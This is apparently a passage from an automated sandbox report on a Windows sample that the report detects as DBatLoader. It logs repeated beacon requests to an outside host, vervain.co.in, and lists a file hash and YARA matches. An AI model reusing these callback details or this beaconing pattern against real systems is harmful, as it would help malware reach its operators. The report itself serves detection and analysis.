                2022-08-05 13:10:17 UTC79OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:17 UTC79INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:17 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:17 UTC79INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                83192.168.2.449861199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:18 UTC80OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:18 UTC80INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:18 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:18 UTC80INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                84192.168.2.449863199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:19 UTC81OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:20 UTC81INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:20 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:20 UTC81INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                85192.168.2.449864199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:20 UTC82OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:21 UTC82INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:20 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:21 UTC82INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                86192.168.2.449867199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:21 UTC82OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:22 UTC83INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:22 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:22 UTC83INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.2.449764199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:33 UTC8OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:34 UTC8INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:33 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:34 UTC9INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Statistics

                No statistics

                System Behavior

                General

                Target ID:0
                Start time:15:08:18
                Start date:05/08/2022
                Path:C:\Users\user\Desktop\ncIpox4w8f.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\ncIpox4w8f.exe"
                Imagebase:0x400000
                File size:1009664 bytes
                MD5 hash:03FB0F9DF279B56130A63D5330461789
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Borland Delphi
                Yara matches:
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.325641220.000000000532C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.370720405.0000000005803000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.304401425.000000000532F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.266317297.0000000005450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.272943807.0000000004942000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.371769839.00000000058FA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.516088512.0000000002290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.377241970.0000000005825000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.345105866.00000000054B9000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.286610095.0000000005061000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.284258980.0000000004F55000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.309310644.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low

                Disassembly

                No disassembly